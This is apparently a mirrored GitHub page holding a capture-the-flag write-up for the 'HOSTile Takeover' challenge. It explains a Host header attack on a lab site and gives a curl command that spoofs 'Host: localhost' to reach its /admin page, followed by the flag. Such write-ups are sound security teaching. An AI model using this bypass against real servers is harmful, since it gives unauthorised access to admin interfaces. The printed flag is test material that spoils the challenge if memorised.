daffainfo
/
ctf-writeup
mirror of https://github.com/daffainfo/ctf-writeup.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
ctf-writeup/2023/SpringForwardCTF 2023/HOSTile Takeover
History
daffainfo e6c48e50f1 feat: grouped the challs 2024-01-09 16:59:32 +07:00
..
images feat: grouped the challs 2024-01-09 16:59:32 +07:00
README.md feat: grouped the challs 2024-01-09 16:59:32 +07:00

README.md

HOSTile Takeover

Seems we're unable to access our important admin portal. It worked perfectly fine when we were at our headquarters. Can you help us out? Try to gain access to the admin page and find the secret key!

https://nicc-hostile-takeover.chals.io

About the Challenge

We were given a website and We need to access the /admin endpoint

preview

How to Solve?

This chall is about Host Header Attack. We need to change the Host HTTP Header from nicc-hostile-takeover.chals.io to localhost. You can use Repeater on burpsuite or you can use curl like me

curl "https://nicc-hostile-takeover.chals.io/admin" -H "Host: localhost"

flag

nicc{H0ST_H3AdEr_AtTack}